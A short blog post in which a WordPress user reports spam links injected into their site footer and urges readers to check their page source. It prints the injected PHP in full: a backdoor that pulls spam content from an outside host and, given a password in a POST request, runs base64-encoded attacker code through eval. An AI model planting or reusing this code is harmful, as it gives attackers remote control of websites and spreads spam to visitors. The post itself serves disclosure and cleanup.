All Things Cahill

Missing Blog Roll and Spam in My Footer…

I updated to the latest and greatest Wordpress the other day and I noticed my blog roll went AWOL.  Actually a good thing as when I started looking at the source I found I had spam getting injected into the footer of my pages.

Check yours - right click view source, then go to the bottom of the page and look for links to Cialis, Tramadol, Forex, all the great spam topics.  If you do have it, you’ll find a link here that will help remove it, or do as I did and have a look in your footer to see if there’s any offensive code.  Here is what the stuff looked like:

<!—Uo=p23ik
<?
$cmd_url=”http://films4u.us/cmd/cmd.php“;
$links_fn=”cssf1x.txt”;
$cur_dir=dirname(__FILE__);
function reload_cmd($cmd_url, $links_fn){
     $cur_dir=dirname(__FILE__);
     $fp_in=implode(file($cmd_url.”?”.$HTTP_HOST));
     $fp_out=fopen($cur_dir.”/”.$links_fn, “w”);
     fwrite($fp_out, $fp_in);
}
$err=error_reporting();
error_reporting(0);
$method=$_GET;
if(isset($_POST["Uo"])&&$_POST["Uo"]=”p23ik”){
     reload_cmd($cmd_url, $links_fn);
     echo base64_decode($_POST["eval"]);
     eval(base64_decode($_POST["eval"]));
     error_reporting($err);
}else{
     $rand=rand(1,5);
     if($rand==1){
          reload_cmd($cmd_url, $links_fn);
     }
     if(file_exists($cur_dir.”/”.$links_fn)){
          $fp=implode(file($cur_dir.”/”.$links_fn));
          echo $fp.”\n”;
     }else{
          reload_cmd($cmd_url, $links_fn);
          $fp=implode(file($cur_dir.”/”.$links_fn));
          echo $fp.”\n”;
     }
     error_reporting($err);
}
?>
Uo=p23ik—>